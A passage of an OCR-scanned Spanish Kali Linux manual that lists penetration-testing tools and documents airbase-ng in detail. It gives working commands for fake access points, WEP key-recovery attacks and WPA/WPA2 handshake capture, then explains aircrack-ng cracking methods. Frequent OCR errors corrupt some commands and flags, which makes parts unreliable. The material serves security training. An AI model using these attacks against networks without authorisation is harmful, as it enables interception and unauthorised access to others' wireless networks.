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1. Introducción 


Kali es una completa reconstrucción del BackTrack Linux y forma parte completamente de los 
estándares de desarrollo de Debían. Toda la nueva infraestructura ha sido puesta en el lugar, todas 
las herramientas fueron revisadas y fueron empaquetadas. 

• Consta de más de 300 herramientas de pruebas de penetración después de revisar todas las 
herramientas que se incluyen en BackTrack. 

• Kali Linux, al igual que su predecesor, es completamente gratis. 

• Github; Su software de código abierto y su árbol de desarrollo está disponible para todos y 
todas las fuentes están disponibles para aquellos que desean modificar y reconstruir 
paquetes. 

• Kali ha sido desarrollado para cumplir con el estándar de jerarquía del sistema de ficheros, 
permitiendo que todos los usuarios de Linux puedan localizar fácilmente los archivos 
binarios, los archivos de soporte, las bibliotecas, etc. 

• Amplio apoyo a dispositivos inalámbricos: Kali Linux soporta los dispositivos inalámbricos, 
permitiendo que funcione correctamente en una amplia variedad de hardware y hacerlo 
compatible con varios USB y otros dispositivos inalámbricos. 

• Kernel personalizado con parches de inyección: Como probadores de penetración, el equipo 
de desarrollo a menudo tiene que hacer evaluaciones inalámbricas para que nuestro kernel 
tenga los últimos parches de inyección incluidos. 

• Entorno de desarrollo seguro: El equipo de Kali Einux está compuesto por un pequeño 
grupo de personas de confianza que sólo puede comprometer e interactuar con los paquetes 
de los repositorios, haciendo uso de múltiples protocolos seguros. 

• Todos los paquetes de Kali son firmados por cada desarrollador individualmente cuando se 
construyen y son comprometidos. Posteriormente también se firman los repositorios de los 
paquetes. 

• Multilenguaje: Aunque las herramientas de penetración tienden a ser escritas en inglés, Kali 
tiene soporte multilingüe, lo que permite a más usuarios poder operar en su idioma nativo y 
encontrar las herramientas necesarias para el trabajo. 

• Totalmente personalizable: Estamos completamente conciente de que no todo el mundo 
estará de acuerdo con nuestras decisiones de diseño por lo que hemos hecho lo más fácil 
posible para nuestros usuarios más aventureros puedan personalizar Kali Einux a su gusto, 
todo el camino hasta el núcleo. 

• Soporte ARMEE y ARMHE: Dado a que los sistemas basados en ARM son cada vez más 
frecuentes y de bajo costo, el soporte de ARM de Kali es robusto y en consecuencia 
funciona en instalaciones que trabajan en sistemas de ARMEE y ARMHE. Kali Einux tiene 
repositorios ARM integrado con la línea principal de distribución de modo que las 
herramientas para ARM serán actualizada en relación con el resto de la distribución. 

En el primer tomo se desarrollan los programas principales: 

• Bettercap: ataque wifi, sniffing, spoofing, proxy 

• Burpsuite 

• ettercap: MiTM, DNS spoofing, ARP spoofing 

• evilgrade: múltiples ataques de red 

• faraday 

• Gohst Phisher 

• Golismero 

• Metasploit / Armitage, msfpc 

• proxychains 




• Social-Engineer Toolkit (SET) 

• websploit 

También en el primer tomo se desarrollan los programas 

Recoger información: airtun-ng, amap, arp-scan, arping, braa, casefile, dig, dmitry, dnmap, fierce, 
host, ike-scan, magic tree, maltego, nbtscan, netdiscover, nmap, nping, nslookup, pOf, traceroute, 
unicornscan, whois, zenmap 

Sniffing: dsniff, eapmdSpass, netsniff-ng, tcpdump, wireshark 
Cisco: CDPSnarf, nipper 

DNS: dns2tcp, dnschef, dnsenum, dnsmap, dnsrecon, dnsspoof, dnstracer, dnswalk, iodine 
Ataques de redes: amapcrap, apt2, arpspoof, backdoor factory, bdfproxy, cymothoa, fragroute, 
fragrouter, hexinject, hpingS, hulk, macof, mitmproxy, netcat, pwnat, routersploit, scapy, sfuzz, 
sniffjoke, sslsplit, sslstrip, sslyze, tSO, webacoo, weevely, yersinia 

En este segundo tomo se desarrollan los programas siguientes 

Ataques wifi: airbase-ng, aircrack-ng, airdecap-ng, airdecloak-ng, aireplay-ng, airmon-ng, 
airodump-ng, airolib-ng, airserv-ng, besside-ng, easside-ng, packetforge-ng, tkiptun-ng, wesside- 
ng, bully, coWPAtty, Eern Wifi Cracker, kismet, mdk3, pixiewps, pyrit, reaver, wash, wifitap, wifite 
Análisis de vulnerabilidad: bed, beef, javasnoop, wapiti 

Análisis de aplicación web: arachni, automater, blindelephant, cURL, dirbuster, dirsearch, 
dotdotpwn, dumpzilla, fimap, funkload, grabber, nikto, paros, powerfuzzer, proxystrike, recon-ng, 
skipfish, sparta, ua-tester, uniscan, urlcrazy, wafwOOf, whatweb, xsser 
Ataques web: hámster, intersect, slowloris, webscarab, wfuzz, zap 
Evaluación de la base de datos: bbqsql, jsql injection, sqlmap, sqlninja, sqlsus. 

Varios: acccheck, ace-voip, drifnet, enum41inux, foremost, ismtp, John the ripper, mimikatz, 
miranda, oscanner, osrf, peepdf, responder, smtp-user-enum, theharvester, u3-pwn 



2. ATAQUES WIFI 


airbase-ng 

Ataca clientes en lugar del punto de acceso (AP) 

aircrack-ng 

Programa de deseifrado de claves 802.11 WEP y WPA / WPA2-PSK. 

airdecap-ng 

Permite descifrar el tráfico inalámbrico una vez que hemos descifrado la clave. 

airdecloak-ng 

Puede descifrar archivos de eaptura WEP / WPA / WPA2 

aireplay-ng 

Herramienta para generar o acelerar el tráfieo en el punto de aceeso (AP). 
Ataque de deauth que golpea a todos excepto al punto de acceso, los ataques 
de contraseña WEP y WPA2, así eomo la inyección ARP y los ataques de 
repetición. 

airmon-ng 

Activar/desactivar modo monitor 

airodump-ng 

Visualización de todas las redes wifi próximas 

airolib-ng 

Diseñada para almacenar y administrar listas de essid y eontraseñas, caleular 
sus claves maestras por pares (PMK) y usarlas en el eraqueo WPA / WPA2. 

airserv-ng 

Cuando se inicia el servidor, escueha en un número de puerto IP y TCP 
específico las conexiones del cliente. 

besside-ng 

Deseifra todas las redes WEP dentro del alcance y registrará los handshakes 
WPA. 

easside-ng 

Permite comunicarse a través de un punto de acceso (AP) encriptado WEP sin 
conoeer la clave WEP. 

packetforge-ng 

Crear paquetes eneriptados que posteriormente puedan usarse para inyección. 

tkiptun-ng 

Esta herramienta está diseñada para inyectar código encriptado en una red 
WPA-TKIP con QoS. 

wesside-ng 

Obtener una clave WEP en minutos. 

bully 

Ataque de fuerza bruta WPS 

coWPAtty 

Ataque de diccionario sin conexión eontra redes WPA/WPA2 

Fem Wifi Cracker 

Programa capaz de descifrar y recuperar claves WEPAVPA/WPS y también 
ejecutar otros ataques 

kismet 

Sniffer y monitorización de redes wifi 

mdk3 

Modo Beaeon Elood, Authentication DoS, ESSID Bruteforee, 

Deauthentieation / Disassoeiation Amok, ete. 

pixiewps 

Atacar offiine con fuerza bruta el pin WPS 

pyrit 

Busca contraseñas wifi a partir de ficheros de sniflfing y eon tratamiento 
offiine. 

reaver 

Ataque de fuerza bruta para conseguir los PINs de un enrutador y su 
eontraseña WPA/WPA2. 

wash 

Visualizaeión de todas las redes wifi próximas 

wifitap 

Permite que cualquier aplieaeión envíe y reeiba paquetes IP utilizando la 
captura y la inyección de tráfico 802.11 a través de una red WiPi 

wifite 

Permite atacar múltiples redes eneriptadas WEP, WPA y WPS 




3. Airbase-ng 


Airbase-ng es una herramienta multipropósito destinada a atacar clientes en lugar del punto de 
acceso (AP). Como es tan versátil y flexible, resumirlo es un desafío. Estas son algunas de las 
caracteristicas más destacadas: 

• Implementa el ataque del cliente WEP Cafíb Eatte 

• Implementa el ataque del cliente Hirte WEP 

• Capacidad para hacer que se capture el handshake WPA / WPA2 

• Capacidad para actuar como un punto de acceso ad-hoc 

• Capacidad para actuar como un punto de acceso completo 

• Capacidad para fíltrar por SSID o direcciones MAC del cliente 

• Capacidad para manipular y reenviar paquetes 

• Capacidad para cifrar paquetes enviados y descifrar paquetes recibidos 

Ea idea principal de la implementación es que debe alentar a los clientes a asociarse con el AP falso, 
no evitar que accedan al AP real. 

Se crea una interfaz táctil (atX) cuando se ejecuta airbase-ng. Esto se puede usar para recibir 
paquetes descifrados o para enviar paquetes cifrados. 

Como los clientes reales probablemente enviarán solicitudes de sondeo para redes comunes / 
confíguradas, estos paquetes son importantes para vincular un cliente a nuestro softAP. En este 
caso, el AP responderá a cualquier solicitud de sonda con una respuesta de sonda adecuada, que le 
indica al cliente que se autentique en el BSSID de airbase-ng. Dicho esto, este modo podria 
interrumpir la funcionalidad correcta de muchos AP en el mismo canal. 

uso: airbase-ng <opciones> <replay interface> 

Opciones: 


-a bssid 

Establecer la dirección MAC del punto de acceso. Si el BSSID no se 
especifíca explicitamente utilizando "-a <BSSID>", se utiliza la 

MAC actual de la interfaz especifícada. 

-i iface 

Capturar paquetes de esta interfaz 

-w WEP key 

Usar esta clave WEP para criptar/desencriptar los paquetes. Si se 
debe utilizar WEP como cifrado, entonces el parámetro "-w <clave 
WEP>" establece la clave de cifrado/descifrado. Esto es sufíciente 
para permitir que airbase-ng establezca todos los flags apropiados 
por si mismo. Si el softAP funciona con encriptación WEP, el cliente 
puede elegir usar autenticación de sistema abierto o autenticación de 
clave compartida. Ambos métodos de autenticación son compatibles 
con airbase-ng. Pero para obtener una secuencia de claves, el usuario 
puede intentar forzar al cliente a usar la autenticación de clave 
compartida. "-S" fuerza una autenticación de clave compartida y "-S 
<len>" establece la duración del desafío. 

-h MAC 

fuente Mac para el modo MITM. Se debe especifícar -M. 

-f allow/disallow 

Si no se especifíca esta opción, el valor predeterminado es "-f 
allow". Esto significa que los diversos filtros MAC del cliente (-d y 
-D) definen que clientes aceptar. Al usar la opción "-f disallow", esto 
invierte la selección y hace que el airbase ignore a los clientes 






especificados por los filtros. 

-W0|1 

Predeterminado: auto 

Esto establece el indicador de beacon WEP. Recordar que los 
clientes normalmente solo se conectarán al AP propio. El significado 
WEP a WEP, abierto para abrir. 

Ea opción "auto" permite que airbase-ng establezca automáticamente 
el fiag a 1 según el contexto de las otras opciones especificadas. Por 
ejemplo, si configura una clave WEP con -w, entonces el indicador 
de beacon se establecerá en WEP. 

Otro uso de "auto" es tratar con clientes que pueden ajustar 
automáticamente su tipo de conexión. Sin embargo, estos son pocos 
y distantes entre si. 

En la práctica, es mejor establecer el valor para el tipo de clientes 
con los que está tratando. 

-q 

Suprime la impresión 

-V 

Yerbóse. No imprime mensajes 

-A 

Esto hace que airbase-ng actúe como un cliente ad-hoc en lugar de 
un punto de acceso normal. 

En modo ad-hoc, airbase-ng también envia beacons, pero no necesita 
ninguna autenticación/asociación. Se puede activar utilizando "-A". 

El AP ajustará automáticamente todos los indicadores necesarios 
para simular una estación en modo ad-hoc y generará una MAC 
aleatoria, que se utiliza como célula MAC en lugar del BSSID. Esto 
puede sobrescribirse con la etiqueta "-a <BSSID>". Ea interfaz 

MAC se utilizará como MAC fuente que se puede cambiar con "-h 
<sourceMAC>". 

-Y in out both 

procesamiento de paquetes externos 

-c channel 

establece el canal en el que está corriendo el punto de acceso 

-X 

Esto hace que el punto de acceso oculte el SSID y no difunda el 
valor. 

-s 

Cuando se especifica, fuerza la autenticación de clave compartida 
para todos los clientes. El AP enviará un rechazo de "método de 
autenticación no compatible" a cualquier solicitud de autenticación 
de sistema abierto si se especifica "-s". 

-S 

establecer longitud de desafio de clave compartida que ouede ir de 

16 a 1480. Valor predeterminado: 128 

-L 

Ataque WEP caflfe-latte 

También se implementa en aireplay-ng como ataque "-6". Se puede 
usar con “-E” o “-caffe-latte”. Este ataque funciona especificamente 
contra clientes, ya que espera una solicitud de arp de transmisión, 
que resulta ser un arp gratuito. Euego voltea algunos bits en el 
remitente MAC e IP, corrige el valor ICV (crc32) y lo envia de 
vuelta al cliente, de donde proviene. El punto por el cual este ataque 
funciona en la práctica es que, al menos, Windows envia arps 
gratuitos después de que se establece una conexión en la capa 2 y se 
establece una IP estática, o dhcp falla y Windows asigna una IP de 
I69.254.X.X. 

"-X <pps>" establece el número de paquetes por segundo para enviar 





euando se realiza el ataque caffe-latte. Por el momento, este ataque 
no se detiene, envia continuamente solicitudes de arp. Airodump-ng 
es necesario para capturar las respuestas. 

-N 

N Hirte Attack (Fragmentation Attack) 

Este ataque escucha una solicitud ARP o un paquete IP del cliente. 
Una vez que se recibe uno, se extrae una pequeña cantidad de PROA 
y luego se usa para crear un paquete de solicitud ARP dirigido al 
cliente. Esta solicitud ARP en realidad está compuesta por múltiples 
fragmentos de paquetes, de modo que cuando se recibe, el cliente 
responderá. Este ataque funciona especialmente bien contra redes 
ad-hoc. Además, se puede usar contra clientes softAP y clientes AP 
normales. Además, se incluyen IP de origen aleatorio y MAC para el 
ataque cfirag para evadir la protección contra inundaciones simple. 

-X nbpps 

Número de paquetes por segundo. Por defecto: 100 

-y 

Deshabilitar sondas de difusión. Al usar esta opción, el AP falso no 
responderá a las sondas de transmisión. Una sonda de difúsión es 
donde el AP especifico no se identifica de forma exclusiva. Por lo 
general, la mayoría de los AP responderán con respuestas de sonda a 
una sonda de difúsión. Este fiag evitará que esto suceda. Solo 
responderá cuando el AP especifico se solicite de forma exclusiva. 

-0 

Esto permite que todas las etiquetas WPA / WPA2 / WEP se habiliten 
en las beacons enviados. No se puede especificar cuando también se 
usa -z 0 -Z 

-z type 

Establece el tag del beacon WPA. Eos valores válidos son 

1=WEP40, 2=TKIP, 3=WRAP, 4=CCMP, 5=WEP104 

Se recomienda que también establezca el fisg WEP en el beacon con 
"-W 1" al usar este parámetro, ya que algunos clientes se confunden 
sin él. 

-Z type 

Establecer el tag del beacon WPA2. Eos valores válidos son 
1=WEP40, 2=TKIP, 3=WRAP, 4=CCMP, 5=WEP104 

Se recomienda que también establezca el fisg WEP en el beacon con 
"-W 1" al usar este parámetro, ya que algunos clientes se confunden 
sin él. 

-V type 

Esto especifica los tipos válidos de EAPOE. Eos valores válidos son 
1=MD5, 2=SHA1, 3=auto 

-F ñame prefix 

escribir todos los paquetes enviados y recibidos en el archivo pcap 

-P 

Esto hace que el punto de acceso falso responda a todas las sondas, 
independientemente de los ESSID especificados. Sin -P, se utilizará 
el antiguo comportamiento de ignorar las sondas para los ESSID que 
no coinciden. 

-I interval 

establecer el valor del intervalo entre beacons en mseg 

Cuando se utiliza una lista de ESSID, todos los ESSID se 
transmitirán con beacons. A medida que se agregan ESSID 
adicionales, el valor del intervalo de baliza se ajusta en función de la 
cantidad de ESSID multiplicado por el valor del intervalo (0x64 
sigue siendo el valor predeterminado). Para soportar el beacon 





"rápido" de una larga lista de ESSID, el parámetro -I se puede 
utilizar para establecer un intervalo más pequeño. Para obtener un 
intervalo de 0x64 para N beacons, establecer el parámetro -I en 0x64 
/ N. Si este valor cae por debajo de 10 más o menos, se alcanzará 
la tasa de inyección máxima y airbase-ng no podrá manejar de 
manera confiable nuevos clientes. 

-C seconds 

habilitar la señalización de valores de ESSID sondeados. 

Ea opeión -P también debe espeeificarse para usar esta opción. Eos 
comodines de los ESSID también transmitirán este número de 
segundos. Un buen valor típico para usar es "-C 60". 

Cuando se ejecuta en el modo predeterminado (sin ESSID) o eon el 
parámetro -P, la opción -C se puede usar para habilitar la transmisión 
de los beacons de los ESSID vistos por las sondas dirigidas. Esto 
permite que un cliente que está sondeando una red dé como 
resultado un beacon para la misma red durante un breve periodo de 
tiempo. Esto funciona bien euando algunos clientes envian sondas 
dirigidas, mientras que otros escuehan pasivamente los beacons. 

-n hex 

El usuario especificó ANonce al hacer el handshake 


Opciones de filtro: 


—bssid MAC 

BSSID a filtrar/usar 

—bssids file 

Eeer una lista de BSSIDs fuera de este fichero 

—Client MAC 

MAC del cliente a filtrar 

—clients file 

Leer una lista de MACs fuera de este fiehero 

-essid ESSID 

Especificar un único ESSID. Por defecto: default 

—essids file 

Leer una lista de ESSIDs fuera de este fichero 

—help 

Ver esta ayuda 


3.1. -Y Procesamiento externo 

El parámetro "-Y" habilita el modo "procesamiento externo". Esto crea una segunda interfaz "atX", 
que se utiliza para reproducir / modificar / descartar o inyectar paquetes a voluntad. Esta interfaz 
también debe aparecer con ifconfig y se necesita una herramienta externa para erear un bucle en 
esta interfaz. 

Ea estruetura del paquete es bastante simple: el encabezado de Ethernet (14 bytes) se ignora y justo 
después de eso sigue el paquete completo ieee80211 de la misma manera que va a ser procesado por 
airbase-ng para los paquetes entrantes o antes de que se envíen los paquetes fuera de la tarjeta 
inalámbrica o paquetes salientes. Este modo intercepta todos los paquetes de datos y los repite a 
través de una aplicación externa, que deeide que pasa con ellos. Ea MAC y la IP de la segunda 
interfaz de tap no importan, ya que los paquetes de ethernet reales en esta interfaz se eliminan de 
todos modos. 

Hay 3 argumentos para "-Y": "in", "out" y "both", que especifican la dirección de los paquetes para 
reeorrer la aplicaeión externa. Obviamente "in" redirige solo los paquetes entrantes a través de la 
NIC inalámbrica, mientras que los paquetes salientes no se toean. "Out" hace lo contrario, solo 
repite los paquetes salientes y "both" envia todas las direcciones a través de la segunda interfaz de 





tap. 

Hay una aplicación de ejemplo pequeña y simple para reprodueir todos los paquetes en la segunda 
interfaz. La herramienta se llama "replay.py" y se eneuentra en "./test". Está eserito en python, pero 
el lenguaje no importa. Utiliza peapy para leer los mareos y seapy para alterar / mostrar y reinyeetar 
los mareos. La herramienta tal eomo es, simplemente reproduee todos los cuadros e imprime un 
breve resumen de los euadros reeibidos. La variable "paeket" eontiene el paquete eompleto 
ieee80211, que puede ser fáeilmente diseeeionado y modifieado usando seapy 
Esto se puede eomparar con los fdtros ettercap, pero es más potente, ya que se puede usar un 
lenguaje de programaeión real para construir una lógica compleja para el fdtrado y la 
personalizaeión de paquetes. La desventaja de usar python es que agrega un retraso de alrededor de 
100 ms y la utilizaeión de la CPU es bastante grande en una red de alta veloeidad, pero es perfeeta 
para una demostraeión eon solo unas poeas líneas de eódigo. 

3.2. Manejo de los paquetes de control 

Los paquetes de eontrol (ACK/RTS/CTS) nunea son enviados por el eódigo, pero a veees se leen. 
Los paquetes de administraeión y de datos siempre se pueden enviar, sin neeesidad de autentiearse 
antes de la asoeiaeión o ineluso el envío de paquetes de datos. Se pueden enviar de inmediato. Los 
olientes reales aún se autentioarán y asooiarán y el softAP debería enviar las respuestas oorreotas, 
pero airbase-ng no se preooupa por verifioar las propiedades y simplemente permite que todas las 
estaoiones se coneoten. Por lo tanto una autentioaoión no puede fallar excepto si SKA es forzado. Lo 
mismo para la fase de asoeiaeión. El AP nunca enviará tramas de desautentioación o disooiación en 
el modo de operaoión normal. 

3.3. Filtrado 

Hay importantes oapaoidades de filtrado. 

Para limitar los ESSID admitidos, se puede espeoifioar “-e <ESSID>” para agregar un ESSID a la 
lista de ESSID permitidos, o usar “-E <ESSIDfile>” para leer una lista de ESSID permitidos de este 
arohivo (un ESSID por línea). 

Lo mismo puede haeerse para las MAC del eliente. “-D <MAC>” agrega un solo MAC a la lista, 

D <MACfile>” agrega todos los MAC fuera del <MACfile> a esa lista (nuevamente, un MAC por 
línea). 

La lista MAC se puede usar para permitir solo los olientes en esta lista y bloquear todos los demás 
(predeterminado), o para bloquear los espeoifioados y permitir todos los demás. Esto se oontrola 
mediante "-f allow" o "-f disallow". "allow" orea una lista blanoa, mientras que "disallow" se orea 
una lista negra. 

3.4. Tap Interface 

Cada vez que se ejeouta airbase, se orea una interfaz de tap (atX). Para usarla, ejeoutar "ifoonfig atX 
up" donde X es el número de interfaz real. 

Esta interfaz tiene muchos usos: 

• Si se espeoifioa una olave de oifrado eon "-w", los paquetes entrantes se desoifrarán y se 
presentarán en la interfaz. 

• Los paquetes enviados a esta interfaz serán transmitidos. Además, se oifrarán si se utiliza la 
opoión "-w". 


3.5. Ejemplos 
3.5.1. Simple 



Usar "airbase-ng <iface>" es suficiente para configurar un AP sin ningún cifrado. Aceptará 
conexiones desde cualquier MAC para cada ESSID, siempre que la autenticación y la asociación se 
dirijan al BSSID. Realmente no puedes hacer mucho en este escenario. Sin embargo presentará una 
lista de clientes que se están conectando más el método de cifrado y los SSID. 

3.5.2. Ataque hirte en el modo punto de acceso 

Este ataque obtiene la clave wep de un cliente. Depende de recibir al menos una solicitud ARP o un 
paquete IP del cliente después de que se haya asociado con el AP falso. 

Entrar; 

airbase-ng -c 9 -e teddy -N -W 1 wlanO 
donde: 

-c 9 especifica el canal 

-e teddy fdtra un solo SSID 

-N especifica el ataque pastor 

-W 1 obliga a los beacons a especificar WEP 

- wlanO especifica la interfaz inalámbrica a utilizar 

El sistema responde: 

18:57:54 Created tap interface atO 

18:57:55 Client 00:0F:B5:AB:CB:9D associated (WEP) to ESSID: "teddy" 

En otra ventana ejecutar 

airodump-ng -c 9 -d 00;06:62:E8:1E:2C -w cfirag wlanO 
donde: 

• -c 9 especifica el canal 

• -d 00:06:62:E8:1E:2C filtra los datos capturados en fake AP MAC. Es opcional. 

• -w especifica el nombre del fichero de los datos capturados 

• wlanO especifica la interfaz inalámbrica por la que se capturan los datos 

Asi es como se ve la ventana cuando airbase-ng ha recibido un paquete del cliente y ha iniciado con 
éxito el ataque: 

CH 9 ][ Elapsed; 8 mins ][ 2008-03-20 19:06 

BSSID PWRRXQ Beacons #Data, #/s CH MB ENC CIPHERAUTH ESSID 

00;06:62:E8;IE:2C 100 29 970 14398 33 9 54 WEP WEP teddy 

BSSID STATION PWR Rate Lost Packets Probes 

00:06:62:P8:IE:2C 00:0P:B5;AB:CB;9D 89 2-48 0 134362 

En este punto, se puede iniciar aircrack-ng en otra ventana de consola para obtener la clave wep. 
Alternativamente usar la opción “-E <prefijo de nombre de archivo> con airbase-ng para escribir 
directamente un archivo de captura en lugar de usar airodump-ng. 

3.5.3. Ataque hirte en modo ad-hoc 

Este ataque obtiene la clave wep de un cliente. Depende de recibir al menos una solicitud ARP o 
paquete IP del cliente después de que se haya asociado con el AP falso. 

Entrar; 

airbase-ng -c 9 -e teddy -N -W 1 -A rausbO 
donde: 

• -c 9 especifica el canal 

• -e teddy filtra una única SSID 

• -N especifica el atque hrte 



• -W 1 fuerza a que los beaeons especifiquen WEP 

• -A especifica el modo ad-hoc 

• wlanO especifica la interfaz inalámbrica a usar 
El resto es igual que el modo AP. 

3.5.4. Ataque caffe latte en modo Access Point 

Este ataque obtiene la clave WEP de un cliente. Depende de recibir al menos una solicitud ARP 
gratuita del cliente después de que se haya asociado con el AP falso. 

Entrar: 

airbase-ng -c 9 -e teddy -E -W 1 rausbO 
donde: 

• -c 9 especifica el canal 

• -e teddy filtra un único SSID 

• -E especifica el atque caffe latte 

• -W 1 fuerza a que los beaeons especifiquen WEP 

• wlanO especifica la interfaz inalámbrica a usar 
El resto es igual que el modo AP. 

3.5.5. Captura de clave compartida 

Este es un ejemplo de capturar el PRGA de una asociación de clave compartida de cliente. 

Entrar: 

airbase-ng -c 9 -e teddy -s -W 1 wlanO 
donde: 

• -c 9 especifica el canal 

• -e teddy filtra un único SSID 

• -s fuerza la autenticación de clave compartida 

• -W 1 fuerza a que los beaeons especifiquen WEP 

• wlanO especifica la interfaz inalámbrica a usar 

El sistema responde: 

15:08:31 Created tap interface atO 

15:13:38 Got 140 bytes keystream: 00:0E:B5:88:AC:82 

15:13:38 SKAfrom 00:0E:B5:88:AC:82 

15:13:38 Client 00:0E:B5:88:AC:82 associated to ESSID: "teddy" 

Eas últimas tres lineas solo aparecen cuando el cliente se asocia con el AP falso. 

En otra ventana ejecutar: 
airodump-ng -c 9 wlanO 
donde: 

• -c 9 especifica el canal 

• wlanO especifica la interfaz inalámbrica a usar 

Asi es como se ve la ventana con una captura exitosa de SKA. Observe "140 bytes keystream: 00: 
CO: CA: 19: E9: 65" en la esquina superior derecha: 

CH 9 ][ Elapsed: 9 mins ][ 2008-03-12 15:13 ][ 140 bytes keystream: 00:C0:CA:19:E9:65 

BSSID PWRRXQ Beaeons #Data, #/s CH MB ENC CIPHERAUTH ESSID 

00:C0:CA:I9:E9:65 87 92 5310 0 0 9 54 WEP WEP SKA teddy 

BSSID STATION PWR Rate Eost Packets Probes 

00:C0:CA:I9:P9:65 00:0P:B5:88:AC:82 83 0- I 0 4096 teddy 





Alternativamente usar la opeión ”-F <name prefix> eon airbase-ng para eseribir direetamente un 
arehivo de eaptura en lugar de usar airodump-ng. 

3.5.6. Captura Handshake WPA 

Este es un ejemplo para eaturar un handshake WPA. 

Ejeeutar; 

airbase-ng -e 9 -e teddy -z 2 -W 1 rausbO 
donde: 

• -c 9 espeeifiea el eanal 

• -e teddy fdtra un únieo SSID 

• -z 2 espeeifiea TKIP 

• -W 1 establece el flag WEP debido a que algunos clientes podrían confundirse. 

• wlanO especifica la interfaz inalámbrica a usar 

El tipo -z se tendrá que cambiar en función del cifrado que se cree está utilizando el cliente. TKIP rs 
el normal para WPA. 

El sistema responde: 

10:17:24 Created tap interface atO 

10:22:13 Client 00:0E:B5:AB:CB:9D associated (WPA1;TKIP) to ESSID: "teddy" 

Ea última linea solo aparece cuando se asocia con clientes. 

En otra ventana ejecutar: 

airodump-ng -c 9 -d 00:C0:C6:94:E4:87 -w cfrag wlanO 

• -c 9 especifica el canal 

• -d 00:C0:C6:94:E4:87 filtra los datos capturados en la falsa AP MAC. Esta MAC es de la 
tarjeta donde corre el AP falso.Esto es opcional. 

• -w especifica el nombre del fichero de los datos capturados 

• wlanO especifica la interfaz inalámbrica donde se capturan los datos 

Cuando el client se conecta, notar el “WPA handshake: 00:C0:C6:94:P4:87” en la esquina superior 
derecha de la venta inferior: 

CH 9 ][ Elapsed: 5 mins ][ 2008-03-21 10:26 ][ WPA handshake: 00:C0:C6:94:P4:87 

BSSID PWRRXQ Beacons #Data, #/s CH MB ENC CIPHERAUTH ESSID 

00:C0:C6:94:E4:87 100 70 1602 14 0 9 54 WPA TKIP PSK teddy 

BSSID STATION PWR Rate Eost Packets Probes 

00:C0:C6:94:P4:87 00:0P:B5:AB:CB:9D 86 2- I 0 75 

Alternativamente usar la opción “-P <file ñame prefix> con airbase-ng para escribir directamente en 
un archivo de captura en lugar de usar airodump-ng. 

Ejecutar "aircrack-ng cfrag-Ol.cap" demuestra que capturó un apretón de manos WPA válido: 
Opening cfrag-Ol.cap 
Read 114392 packets. 

# BSSID ESSID Encryption 

I 00:C0:C6:94:E4:87 teddy WPA (I handshake) 


3.5.7. Captura Handshake WPA2 




Capturar un WPA2 es básicamente idéntico al ejemplo anterior con respecto a WPA. La diferencia 
tipica es especificar -Z 4 (cifrado CCMP) en lugar de -z 2. 

Entrar: 

airbase-ng -c 9 -e teddy -Z 4 -W 1 rausbO 

El balance es el mismo que la captura de protocolo de enlace WPA. 



4. Aircrack-ng 


4.1. Descripción 

Aircrack-ng es un programa de descifrado de claves 802.11 WEP y WPA / WPA2-PSK. 

Aircrack-ng puede recuperar la clave WEP una vez que se hayan capturado suficientes paquetes 
cifrados con airodump-ng. Esta parte de la suite aircrack-ng determina la elave WEP utilizando 2 
métodos fundamentales. El primer método es a través de la propuesta PTW (Pyshkin, Tews, 
Weinmann). El método de eraqueo predeterminado es PTW. Esto se hace en 2 fases. En la primera 
fase, aircraek-ng solo usa paquetes ARP. Si no se eneuentra la clave, utiliza todos los paquetes en la 
captura. Recuerde que no todos los paquetes se pueden usar para el método PTW. Lina limitación 
importante es que el ataque PTW aetualmente solo puede descifrar claves WEP de 40 y 104 bits. Ea 
prineipal ventaja del enfoque PTW es que se requieren muy pocos paquetes de datos para descifrar 
la clave WEP. El segundo método es el método EMS / KoreK. El método EMS / KoreK incorpora 
varios ataques estadisticos para descubrir la clave WEP y los utiliza en combinación con el 
forzamiento bruto. 

Además el programa ofrece un método de dieeionario para determinar la elave WEP. 

Para descifrar claves preeompartidas WPA / WPA2, solo se utiliza un método de diccionario. El 
soporte SSE2 se incluye para acelerar drástieamente el procesamiento de claves WPA / WPA2. Se 
requiere un " handshake de euatro vias" como entrada. Para los handshake WPA, un handshake 
completo se eompone de 4 paquetes. Sin embargo aircrack-ng puede funcionar con éxito con solo 2 
paquetes. Eos paquetes EAPOE (2 y 3) o los paquetes (3 y 4) se consideran un handshake eompleto 

4.2. ¿Cómo funciona? 

El primer método es el método PTW (Pyohkine, Tews, Weinmann). En 2005, Andreas Klein 
presentó otro análisis del eifrado de flujo RC4. Klein demostró que hay más correlaeiones entre el 
flujo de elaves RC4 y la elave que las encontradas por Eluhrer, Mantin y Shamir y que pueden 
usarse adicionalmente para romper WEP. El método PTW extiende el ataque de Klein y lo optimiza 
para su uso contra WEP. Básicamente utiliza técnicas mejoradas de EMS descritas en la siguiente 
sección. Lina restricción particularmente importante es que solo funeiona eon paquetes de solicitud / 
respuesta arp y no puede emplearse contra otro tráfico. 

El segundo método es el método EMS / Korek que ineorpora múltiples téenieas. En este método, se 
combinan varias técnicas para descifrar la clave WEP; 

• Ataques EMS (Eluhrer, Mantin, Shamir) - téenieas estadistieas 

• Ataques Korek - téenieas estadistieas 

• Euerza bruta 

Cuando se utilizan téenieas estadistieas para descifrar una clave WEP, cada octeto de la clave se 
maneja esencialmente de forma individual. Usando matemátiea estadistiea, la posibilidad de que 
cierto octeto en la elave se adivine eorreetamente sube hasta un 15% cuando se eaptura el veetor de 
inieialización (IV) eorreeto para un oeteto clave particular. Esencialmente ciertos IVs "filtran" la 
clave WEP seereta para octetos de clave particulares. Esta es la base fundamental de las téenieas 
estadistieas. 

Al utilizar una serie de pruebas estadistieas llamadas ataques EMS y Korek, se acumulan votos para 
las claves probables para cada octeto clave de la clave WEP seereta. Los diferentes ataques tienen 
un número diferente de votos asociados, ya que la probabilidad de que cada ataque produzea la 
respuesta correcta varia matemáticamente. Cuantos más votos aeumule un valor clave potencial 



particular, más probable es que sea correcto. Para cada octeto elave, la pantalla muestra la clave 
seereta probable y el número de votos que ha acumulado hasta ahora. No es necesario deeir que la 
clave secreta con el mayor número de votos probablemente sea eorreeta, pero no está garantizada. 
Aircrack-ng probará posteriormente la clave para confirmarla. 

Mirar un ejemplo con suerte aelarará esto. En la captura de pantalla anterior, se puede ver que en el 
octeto 0 clave el octeto OxAE ha reunido algunos votos, 50 en este easo. Entonees, 
matemáticamente, es más probable que la clave comienee con AE que con 11 que es el segundo en 
la misma linea, que es easi la mitad de lo posible. Eso explica porque cuantos más datos estén 
disponibles, mayores serán las posibilidades de que aircrack-ng determine la clave WEP seereta. 

Sin embargo el enfoque estadístico solo puede llevarlo tan lejos. Ea idea es ingresar al parque de 
